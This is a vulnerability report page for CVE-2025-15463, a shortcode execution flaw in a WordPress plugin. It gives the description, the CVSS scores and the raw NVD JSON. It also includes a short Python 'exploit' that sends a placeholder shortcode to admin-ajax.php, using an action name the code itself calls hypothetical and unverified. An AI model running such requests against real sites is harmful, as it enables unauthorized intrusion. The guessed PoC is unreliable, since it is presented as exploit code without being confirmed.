Security Vulnerability Report
中文
CVE-2025-15463 CVSS 6.5 MEDIUM

CVE-2025-15463

Published: 2026-05-12 23:16:16
Last Modified: 2026-05-13 15:26:44
Source: [email protected]

Description

The The Advanced Custom Fields: Extended plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 0.9.2.3. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Advanced Custom Fields: Extended <= 0.9.2.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Exploit for CVE-2025-15463 # Target: WordPress with Advanced Custom Fields: Extended <= 0.9.2.3 # Description: Unauthenticated arbitrary shortcode execution target = "http://example.com" # The vulnerable endpoint is typically an AJAX action or a specific form handler # Based on the module 'module-form-front-render.php', the action might be related to ACF rendering url = f"{target}/wp-admin/admin-ajax.php" # Payload containing a malicious shortcode # Using a standard shortcode like [gallery] to verify execution, or a custom one for exploitation payload_data = { "action": "acf_frontend/render", # Hypothetical action name, actual action needs verification "acf_extended[field]": "[your_malicious_shortcode]" } try: response = requests.post(url, data=payload_data) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15463", "sourceIdentifier": "[email protected]", "published": "2026-05-12T23:16:15.883", "lastModified": "2026-05-13T15:26:44.333", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The The Advanced Custom Fields: Extended plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 0.9.2.3. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/acf-extended/tags/0.9.2.2/includes/modules/form/module-form-action-email.php#L111", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/acf-extended/tags/0.9.2.2/includes/modules/form/module-form-front-render.php#L35", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f8544784-1994-47e2-be39-568d0ab9ee00?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.